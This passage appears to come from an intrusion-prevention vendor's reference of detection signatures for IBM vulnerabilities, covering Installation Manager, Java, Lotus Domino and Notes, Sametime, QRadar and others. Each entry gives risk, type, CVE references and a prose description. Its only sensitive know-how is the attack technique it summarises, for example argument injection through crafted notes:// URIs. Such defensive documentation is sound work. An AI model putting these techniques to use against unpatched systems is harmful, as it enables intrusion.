There is an argument injection vulnerability in IBM Installation Manager. The vulnerability is due to insufficient checks when parsing iim:// URIs that could allow execution of arbitrary remote programs. A remote attacker can exploit this vulnerability by enticing the target user to open an HTML file that contains a crafted iim:// URI, which could lead to execution of arbitrary programs on the target.

Situation:

HTTP_SS-IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
File-Text_IBM-Installation-Manager-IIM-URI-Handling-Code-Execution

References:

BID-36549
http://www.securityfocus.com/bid/36549

IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach

About this vulnerability:

A vulnerability in IBM Java

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Java

Type:

Malfunction

Description:

There exists a sandbox breach vulnerability in IBM Java. A remote, unauthenticated attacker can use this to execute arbitrary Java code outside the sandbox.

Situation:

File-Binary_IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach

References:

CVE-2012-4820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4820

OSVDB-87300
http://www.osvdb.org/87300

IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach

About this vulnerability:

A vulnerability in IBM Java

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Java

Type:

Malfunction

Description:

A sandbox breach vulnerability exists in IBM Java. The vulnerability is due to insecure use of the java.lang.ClassLoader.defineClass method by IBM Java packages. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.

Situation:

File-Binary_IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach

References:

CVE-2012-4823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4823

BID-55495
http://www.securityfocus.com/bid/55495

OSVDB-87301
http://www.osvdb.org/87301

IBM-Java-Multiple-Packages-Sandbox-Breach

About this vulnerability:

A vulnerability in IBM Java

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Java

Type:

Malfunction

Description:

A sandbox breach vulnerability exists in IBM Java. The vulnerability is due to insecure use of certain methods in java.lang.class by IBM Java packages. An unauthenticated remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. Successful exploitation can result in the execution of arbitrary Java code outside the sandbox.

Situation:

File-Binary_IBM-Java-Multiple-Packages-Sandbox-Breach

References:

CVE-2012-4822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4822

BID-55495
http://www.securityfocus.com/bid/55495

OSVDB-87302
http://www.osvdb.org/87302

IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino; IBM Notes And Domino

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in IBM Lotus Domino. The vulnerability is due to improper bounds checking while parsing a BMP image with an overly large color palette. By sending a crafted email to a Domino server, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code with System privileges on the target server.

Situation:

File-Binary_IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow

References:

CVE-2015-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1903

IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Domino

Risk:

High

First detected in:

sgpkg-ips-675-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Domino; IBM Lotus Notes

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in IBM Lotus Domino. The vulnerability is due to improper bounds checking when parsing a BMP image with crafted dimensions. This could potentially lead to an undersized buffer being allocated. A remote, unauthenticated attacker can exploit this vulnerability by sending an email containing a crafted BMP image to the target server. A successful attack could possibly result in the ability to execute arbitrary code with System privileges on the target server.

Situation:

File-Binary_IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow

References:

CVE-2015-1902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1902

IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Lotus Domino
Risk:	Moderate
First detected in:	sgpkg-ips-402-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Lotus Domino
Type:	Input Validation
Description:	A stack buffer overflow has been reported in IBM Lotus Domino. The vulnerability exists in the WebAdmin.nsf module, when variables from an HTTP POST request are copied to a stack buffer without prior validation.
Situation:	HTTP_CRL-IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow

IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Domino

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way IBM Lotus Domino IMAP Server handles LSUB requests. The vulnerability is due to lack of boundary protection while processing the subscribed mailbox names. A remote authenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System.

Situation:

IMAP_CS-IBM-Lotus-Domino-IMAP-Server-Buffer-Overflow

References:

CVE-2007-3510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3510

BID-26219
http://www.securityfocus.com/bid/26219

IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Domino

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in IBM Lotus Domino's LDAP service.

Situation:

LDAP_CS-IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow

References:

CVE-2011-0917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0917

BID-46231
http://www.securityfocus.com/bid/46231

IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Domino

Risk:

High

First detected in:

sgpkg-ips-287-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Integer Overflow

Description:

There is a heap buffer overflow in IBM Lotus Domino Server. The vulnerability is due to an integer overflow that can occur when processing LDAP messages. A remote unauthenticated attacker could leverage this vulnerability by sending a crafted LDAP message to the target server. Successful exploitation could lead to the execution of arbitrary code on the target server in the security context of the affected service.

Situation:

LDAP_CS-IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow

References:

CVE-2010-0358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0358

IBM-Lotus-Domino-LDAP-Server-Memory-Exception

About this vulnerability:

A vulnerability in IBM Lotus Domino

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Malfunction

Description:

There is a memory exception vulnerability in IBM Lotus Domino LDAP Server. The flaw is caused by improper validation of the user supplied data in an LDAP bind request. An attacker can exploit this vulnerability to terminate the target server which causes a denial of service condition.

Situation:

LDAP_CS-IBM-Lotus-Domino-LDAP-Server-Memory-Exception

References:

CVE-2006-0580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0580

BID-16523
http://www.securityfocus.com/bid/16523

IBM-Lotus-Domino-Mailto-Buffer-Overflow

About this vulnerability:

An IBM Lotus Domino Mailto Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the IBM Lotus Domino, versions 8.0.x before 8.0.2 FP5 and 8.5.x before 8.5.1 FP2, in the nrouter.exe service, which allows remote attackers to execute arbitrary code via a long e-mail address in an ORGANIZER:mailto header in an iCalendar calendar invitation.

Situation:

SMTP_CS-IBM-Lotus-Domino-Mailto-Buffer-Overflow

References:

CVE-2010-3407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3407

OSVDB-68040
http://www.osvdb.org/68040

IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in IBM Lotus Domino
Risk:	High
First detected in:	sgpkg-ips-372-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Lotus Domino
Type:	Buffer Overflow
Description:	A stack buffer overflow vulnerability exists in IBM Lotus Domino Server. The vulnerability is due an error in processing e-mail messages containing iCalendar requests. A remote unauthenticated attacker could leverage this vulnerability by sending a malicious iCalendar e-mail message to a target server. Successful exploitation could lead to the execution of arbitrary code on a target server, within the security context of the affected service. In an unsuccessful attack, the target server could terminate abnormally.
Situation:	E-Mail_BS-IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow File-TextId_IBM-Lotus-Domino-Nrouter.exe-ICalendar-Mailto-Stack-Buffer-Overflow

IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in IBM Lotus Domino Web Access

Risk:

High

First detected in:

sgpkg-ips-136-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Domino Web Access; Lotus Domino

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM Lotus Domino Web Access ActiveX control. The flaw is due to improper bound protection in the InstallBrowserHelperDll() method when processing user-supplied arguments. A remote attacker may persuade the target user to open a malicious web page to inject and execute arbitrary code on the vulnerable system with the privileges of the currently logged on user.

Situation:

HTTP_SS-IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
File-Text_IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-4474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4474

BID-26972
http://www.securityfocus.com/bid/26972

OSVDB-40954
http://www.osvdb.org/40954

IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service

About this vulnerability:

A vulnerability in IBM Lotus Domino Web Server

Risk:

Low

First detected in:

sgpkg-ips-580-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Domino Web Server

Type:

Insecure Configuration

Description:

There is a vulnerability in the Lotus Domino Web Server 6.0, 6.5.x before 6.5.6, and 7.0.x before 7.0.3 that allows remote attackers to cause a denial of service (daemon crash) via requests for URLs that reference certain files.

Situation:

HTTP_CSU-IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service

References:

CVE-2007-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0067

BID-24307
http://www.securityfocus.com/bid/24307

OSVDB-35766
http://www.osvdb.org/35766

IBM-Lotus-iNotes-Buffer-Overflow-Vulnerability

About this vulnerability:

Buffer overlfow vulnerability in Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-339-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Lotus Notes iNotes server. The vulnerability is due to insufficient boundary checks when processing malformed HTTP requests. A remote unauthenticated attack can leverage this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service, which is usually SYSTEM.

Situation:

HTTP_CRL-Lotus-Notes-iNotes-BOF

References:

CVE-2003-0178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0178

BID-6871
http://www.securityfocus.com/bid/6871

OSVDB-10826
http://www.osvdb.org/10826

IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus iNotes

Risk:

Low

First detected in:

sgpkg-ips-467-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus iNotes

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in IBM Lotus iNotes. The vulnerability is due to a boundary error within the dwa85W.dll ActiveX control when setting the property Attachment_Times with an overly long string. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_IBM-Lotus-iNotes-Dwa85w.dll-ActiveX-Control-Buffer-Overflow

References:

CVE-2012-2175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2175

OSVDB-82755
http://www.osvdb.org/82755

IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow

About this vulnerability:	A buffer overflow vulnerability in IBM Lotus Notes
Risk:	High
First detected in:	sgpkg-ips-132-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Lotus Notes
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in IBM Lotus Notes. The vulnerability is due to a boundary error in the Lotus 1-2-3 file viewer. A remote attacker could leverage this vulnerability by enticing a target user to view the maliciously crafted email attachment. Successful attack could allow for arbitrary code injection and execution with the privileges of the currently logged on user.
Situation:	E-Mail_BS-IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow File-Binary_IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow

IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in IBM Lotus Notes.

Situation:

SMTP_CS-IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
File-TextId_IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow

References:

CVE-2007-5405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5405

BID-28454
http://www.securityfocus.com/bid/28454

IBM-Lotus-Notes-Cross-Site-Scripting

About this vulnerability:

A vulnerability in IBM Lotus Domino

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Domino; Lotus Notes

Type:

Malfunction

Description:

There is a security flaw in IBM Lotus Domino Web Access (DWA) and Lotus Notes. Embedded JavaScript in HTML formatted Emails will automatically be executed when opened. A attacker can leverage this vulnerability to execute scripts in Lotus Notes or in the DWA browser session. A successful exploitation through Lotus Mail will cause the malicious JavaScript embedded in the HTML formatted Email message to be executed. The behaviour of the target is dependent on the code in the malicious script. Note that the malicious script cannot access the local filesystem without explicit user confirmation. A successful attack exploiting Domino Web Access can inject malicious script code into the DWA session. An attacker can read or delete email, access the user's contact list and other operations on the user's mail account. The attacker can fully control the compromised mail account. The malicious script could also take actions on the user's computer in the security context of the DWA web site.

Situation:

File-Text_IBM-Lotus-Notes-Cross-Site-Scripting

References:

CVE-2005-2175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2175

BID-14164
http://www.securityfocus.com/bid/14164

IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the way IBM Lotus Notes Attachment Viewer processes files. The vulnerability is a result of insufficient boundary checking while processing the Microsoft Word for DOS Document. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Word for DOS file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Lotus Notes will terminate.

Situation:

File-Binary_IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow

References:

CVE-2007-5544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544

BID-26146
http://www.securityfocus.com/bid/26146

IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-127-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in IBM Lotus Notes. The vulnerability is a result of insufficient boundary checking while parsing HTML formatted e-mail. A remote attacker can exploit this vulnerability by persuading the target user to perform a certain operation on a crafted e-mail message, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

E-Mail_BS-IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow
File-Text_IBM-Lotus-Notes-HTML-Message-Handling-Buffer-Overflow

References:

CVE-2007-4222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4222

BID-26200
http://www.securityfocus.com/bid/26200

IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-407-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in IBM Lotus Notes File Viewer. The vulnerability is due to a stack buffer overflow while parsing headers of LZH files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing to view it with the affected software. This could lead to code execution in the context of the affected application. In the event code execution is unsuccessful, it could lead to abnormal termination of the affected process, leading to a denial-of-service condition.

Situation:

SMTP_IBM-Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow
File-Binary_Lotus-Notes-Lzh-Attachment-Viewer-Stack-Buffer-Overflow

References:

CVE-2011-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213

BID-47962
http://www.securityfocus.com/bid/47962

IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow

About this vulnerability:

A vulnerability in Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Notes

Type:

Buffer Overflow

Description:

Multiple buffer overflow vulnerabilities exist in IBM Lotus Notes attachment viewer. The vulnerabilities are result of insufficient boundary checking while processing the Frame Maker Interchange File (MIF) files. A remote attacker can exploit these vulnerabilities by enticing the target user to open a crafted MIF email attachment, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

File-TextId_IBM-Lotus-Notes-MIF-Attachment-Viewer-Buffer-Overflow

References:

BID-26175
http://www.securityfocus.com/bid/26175

IBM-Lotus-Notes-Url-Handler-Command-Execution

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

Moderate

First detected in:

sgpkg-ips-471-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Input Validation

Description:

There is a command execution vulnerability in IBM Lotus Notes. The vulnerability is due to improper validation of notes: URIs. If the URI contains the string "-RPARAMS" subsequent substrings are interpreted as parameters of rcplauncher.exe allowing an attacker to execute a command by using the "-vm" parameter. Remote, unauthenticated attackers can exploit this vulnerability by enticing a user to click on a crafted "notes://" URI. Successful exploitation would result in execution of arbitrary commands in the context of the affected application.

Situation:

File-Text_IBM-Lotus-Notes-Url-Handler-Command-Execution

References:

CVE-2012-2174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174

BID-54070
http://www.securityfocus.com/bid/54070

OSVDB-83063
http://www.osvdb.org/83063

IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Notes

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in the IBM Lotus Notes WPD. The vulnerability is due to a boundary-check error when processing Corel WordPerfect (WPD) files. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted Corel WordPerfect file to the target users, potentially causing arbitrary code to be injected and executed on the target system in the security context of the current user. In an attack case where code injection is not successful, the instance of the vulnerable IBM Lotus Notes application will terminate abnormally. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-Binary_IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow

References:

CVE-2008-4564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4564

BID-34086
http://www.securityfocus.com/bid/34086

OSVDB-52713
http://www.osvdb.org/52713

IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Quickr for Domino

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Quickr

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in IBM Lotus Quickr for Domino. The vulnerability is due to an integer overflow within the qp2.cab ActiveX control. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow

References:

CVE-2013-3026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3026

OSVDB-94068
http://www.osvdb.org/94068

IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Quickr

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Quickr

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in IBM Lotus Quickr. The vulnerability is due to an unbounded string copy within the QuickPlace ActiveX control when setting either the Attachment_Times or Import_Times property. A remote attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user's browser.

Situation:

File-Text_IBM-Lotus-Quickr-Qp2.cab-ActiveX-Control-Stack-Buffer-Overflow

References:

CVE-2012-2176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2176

BID-53678
http://www.securityfocus.com/bid/53678

IBM-Lotus-Sametime-DoS

About this vulnerability:

A IBM Lotus Sametime DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Sametime

Type:

Input Validation

Description:

A vulnerability in IBM Lotus Sametime, versions 8.5.2 and 8.5.2.1, that allows remote attackers to cause a denial of service condition via a crafted audio visual session.

Situation:

SIP-TCP_IBM-Lotus-Sametime-DoS

References:

CVE-2013-3986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3986

BID-63611
http://www.securityfocus.com/bid/63611

OSVDB-99552
http://www.osvdb.org/99552

IBM-Lotus-Sametime-Information-Disclosure

About this vulnerability:

A possible IBM Lotus Sametime Information Disclosure vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Sametime

Type:

Insecure Configuration

Description:

Traffic has been identified that could possibly be a vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to obtain version, configuration, and possibly other sensitive information via a request to a public page.

Situation:

HTTP_CSU-IBM-Lotus-Sametime-Information-Disclosure

References:

CVE-2013-3982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3982

IBM-Lotus-Sametime-Room-Name-BruteForce

About this vulnerability:

An IBM Lotus Sametime Room Name Bruteforce vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-762-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Sametime

Type:

Brute Force

Description:

A vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to determin which meeting rooms are owned by a user.

Situation:

HTTP_CSU-IBM-Lotus-Sametime-Room-Name-BruteForce

References:

CVE-2013-3977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3977

IBM-Lotus-Sametime-User-Enumeration

About this vulnerability:

An IBM Lotus Sametime User Enumeration vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Lotus Sametime

Type:

Brute Force

Description:

A vulnerability in IBM Lotus Sametime, versions 8.x through 8.5.2.1 and 9.x through 9.0.0.1, which allows remote attackers to discover user names, full names, and email addresses via a search.

Situation:

HTTP_CSU-IBM-Lotus-Sametime-User-Enumeration

References:

CVE-2013-3975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3975

IBM-Notes-PNG-Image-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Lotus Notes

Type:

Integer Overflow

Description:

A code execution vulnerability exists in IBM Notes (formerly Lotus Notes). The vulnerability is due to an integer overflow while parsing PNG images. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to view a malicious e-mail. Successful exploitation would allow the attacker to execute arbitrary code on the target system.

Situation:

File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value

References:

CVE-2013-2977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2977

BID-59693
http://www.securityfocus.com/bid/59693

OSVDB-93057
http://www.osvdb.org/93057

IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution

About this vulnerability:

An IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM OpenAdmin Tool

Type:

Input Validation

Description:

A vulnerability in IBM OpenAdmin Tool, versions 11.5, 11.7, and 12.1, which allows remote attackers to execute arbitrary code as system admin, due to the lack of input validation in the new_home_page parameter of the saveHomePage method.

Situation:

HTTP_CRL-IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution

References:

CVE-2017-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1092

IBM-Operational-Decision-Manager-Datasource-JNDI-Injection

About this vulnerability:

An attempt to exploit a vulnerability in IBM Operational Decision Manager detected

Risk:

High

First detected in:

sgpkg-ips-1710-5242

Last changed:

sgpkg-ips-1710-5242

Platform:

Unix

Software:

IBM Operational Decision Manager

Type:

Input Validation

Description:

A vulnerability in IBM Operational Decision Manager, versions 8.10.3, 8.10.4, 8.10.5.1, 8.11.0.1, 8.11.1, and 8.12.0.1, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to improper handling of user input in the datasource parameter.

Situation:

HTTP_CS-IBM-Operational-Decision-Manager-Datasource-JNDI-Injection

References:

CVE-2024-22319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22319

IBM-Qradar-Siem-Authentication-Bypass

About this vulnerability:

A vulnerability in IBM QRadar Security Information and Event Manager (SIEM)

Risk:

Moderate

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM QRadar

Type:

Malfunction

Description:

Lack of authentication in a function causes an authentication bypass vulnerability in IBM QRadar. A successful exploit allows arbitrary code execution as the "nobody" user.

Situation:

HTTP_CRL-IBM-Qradar-Siem-Authentication-Bypass

References:

CVE-2018-1418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1418

IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization

About this vulnerability:

A vulnerability in IBM QRadar Security Information and Event Manager (SIEM)

Risk:

High

First detected in:

sgpkg-ips-1303-5242

Last changed:

sgpkg-ips-1303-5242

Platform:

Generic

Software:

IBM QRadar

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in IBM QRadar SIEM. This vulnerability is due to insufficient validation of requests sent to the RemoteJavaScript servlet. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation can result in result in arbitrary code execution under the security context of the affected server.

Situation:

HTTP_CRL-IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization

References:

CVE-2020-4280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4280

IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution

About this vulnerability:

A vulnerability in IBM Rational ClearQuest

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Rational ClearQuest

Type:

Input Validation

Description:

A security vulnerability has been reported in IBM's Rational ClearQuest CQOle ActiveX control. The vulnerability is due to a function prototype mismatch in an API call provided by the control. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to view crafted web content. A successful exploitation attempt may result in the execution of arbitrary code in the target user's security context.

Situation:

File-Text_IBM-Rational-Clearquest-Cqole-ActiveX-Code-Execution

References:

CVE-2012-0708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0708

OSVDB-81443
http://www.osvdb.org/81443

